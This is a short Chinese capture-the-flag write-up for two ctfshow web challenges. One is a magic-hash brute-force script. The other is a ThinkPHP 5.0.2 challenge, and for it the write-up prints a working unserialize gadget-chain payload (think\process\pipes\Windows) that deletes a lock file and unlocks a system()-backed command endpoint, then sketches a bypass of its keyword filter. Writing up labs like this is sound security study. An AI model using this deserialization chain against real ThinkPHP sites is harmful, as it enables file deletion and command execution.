2021ctfshow月饼杯web

随便写写给自己看，同时也热烈欢迎师傅的意见与批评

web签到

直接跑脚本。

<?php
$str = '0e';
for($i=1;$i<=1000000000;$i++){
    $md5 = $str.$i;
    if(hash('md5',$md5) == $md5){
        echo $md5;
        break;
    }
}

eztp

<?php
namespace app\index\controller;
class Index
{   
    public function index($run=[])
    {
        highlight_file(__FILE__);
        echo '
Welcome to CTFSHOW
';
        echo 'Powered by PHPthink5.0.2
';
        echo dirname(__FILE__);

    if (!empty($run[2])){
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
    if (!empty($run[1])){
            unserialize($run[1]);
        }
    }
    // hint:/index/index/backdoor
    public function backdoor(){
        if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){
        echo "Try to post CMD arguments".'<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i',$data['cmd'])){
                $cmd = escapeshellarg($data['cmd']);
        $cmd='cat '.$cmd;
        echo $cmd;
                system($cmd);
            }else{
                echo "No No No";
            }

        }else{
        echo dirname(__FILE__).'/../../'."install.lock has not been deleted";
    }
    }
}
Welcome to CTFSHOW

Powered by PHPthink5.0.2
/var/www/html/application/index/controller

框架为thinkphp5，肯定涉及到相关漏洞。hint提示说访问/index/index/backdoor,进入后提示'/var/www/html/application/index/controller/../../install.lock未被删除'。
然后在backdoor函数下会判断是否存在该文件，不存在即接受post的cmd，再$cmd='cat '.$cmd;system($cmd)然后就可以直接查看文件。
在index方法下有反序列化过程，因此删除操作就要在这儿做文章了。wp说利用任意文件删除链子，这里附上thinkphp5的复现过程
其中提到windows.php下有_destruct，其下removefile函数删除文件。

payload即

<?php 
namespace think\process\pipes;
class Windows{ 
	private $files=[];
	public function __construct()
	{
		$this->files = ['/var/www/html/application/index/controller/../../install.lock'];
	} 
} 
echo serialize(new Windows());
echo "\n";
echo urlencode(serialize(new Windows()));
?>

?run[1]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F..%2F..%2Finstall.lock%22%3B%7D%7D

删除相关文件。再此访问时

后面访问/flag。题目中过滤说不能包含flag，试图用?,*方式绕过访问，结果如下
因为这里涉及到函数escapeshellarg。

于是就用其他方式绕过。

url解码后为不可见字符，命令解析时直接跳过。